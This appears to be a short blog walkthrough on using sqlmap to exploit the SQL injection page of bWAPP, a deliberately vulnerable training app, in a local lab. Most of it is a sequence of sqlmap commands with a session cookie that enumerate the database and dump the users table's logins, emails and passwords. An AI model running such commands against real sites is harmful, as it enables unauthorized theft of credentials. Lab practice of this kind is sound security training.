Open in app

Sign in

Write

Sign in

Exploit bWAPP using SQLmap

Shi
2 min readApr 25, 2020

1) install Kali and bWAPP vm in virtual box;

2) launch bWAP and make sure it is running;

3) Launch Kali and make sure you can access the bWAPP from Iceweasel.

4) Go to SQL Injection (GET/Search)

5) key in a search string; copy of the resulted URL;

6) Find out the cookie for the site;

Now, it is show time; launch SQLmap from terminal;

root@kali:~# sqlmap -u “ http://192.168.56.101/bWAPP/sqli_1.php?title=" — cookie=”PHPSESSID=a9bd3686d9c53a3a8c0842c8886b564b;security_level=0" — dbs
root@kali:~# sqlmap -u “ http://192.168.56.101/bWAPP/sqli_1.php?title=" — cookie=”PHPSESSID=a9bd3686d9c53a3a8c0842c8886b564b;security_level=0" -D **bWAPP ** — tables
root@kali:~# sqlmap -u “ http://192.168.56.101/bWAPP/sqli_1.php?title=" — cookie=”PHPSESSID=a9bd3686d9c53a3a8c0842c8886b564b;security_level=0" -D **bWAPP **-T **users ** — columns
root@kali:~# sqlmap -u “ http://192.168.56.101/bWAPP/sqli_1.php?title=" -cookie=”PHPSESSID=a9bd3686d9c53a3a8c0842c8886b564b;security_level=0" -D bWAPP -T users -C** login,email,password** — dump

Originally published at https://github.com.

Bwapp
Sqlmap
Pentesting
Security
Kali Linux

--

--

Shi

Written by Shi

52 Followers

I am a coder/engineer/application security specialist. I like to play around with language and tools; I have strong interest in efficiency improvement.

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams